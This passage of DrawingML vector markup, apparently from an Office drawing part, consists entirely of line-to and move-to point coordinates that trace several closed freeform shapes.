                      <a:pt x="413" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="429" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="428" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="432" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="166"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="160"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="417" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="408" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="403" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="165"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="167"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="177"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="180"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="181"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="385" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="144"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="380" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="89"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="354" y="25"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="354" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="356" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="360" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="374" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="359" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="350" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="335" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="334" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="333" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="329" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="328" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="323" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="313" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="154"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="306" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="140"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="245" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="228" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="220" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="229" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="240" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="243" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="250" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="255" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="266" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="269" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="272" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="296" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="308" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="322" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="345" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="353" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="354" y="25"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="398" y="254"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="396" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="381" y="245"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="376" y="243"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="386" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="249"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="401" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="254"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="448" y="253"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="450" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="244"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="240"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="477" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="506" y="224"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="507" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="502" y="229"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="233"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="238"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="471" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="464" y="248"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="251"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="456" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="253"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="448" y="253"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="158" y="198"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="158" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="196"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="188"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="186"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="202" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="191"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="244" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="192"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="251" y="197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="256" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="259" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="265" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="291" y="214"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="297" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="302" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="303" y="228"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="227"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="275" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="223"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="222"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="212" y="211"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="213"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="212"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="209"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="208"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="206"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="202"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="198"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="198"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="180" y="139"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="174" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="171" y="134"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="129"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="180" y="139"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="514" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="514" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="511" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="513" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="519" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="66"/>
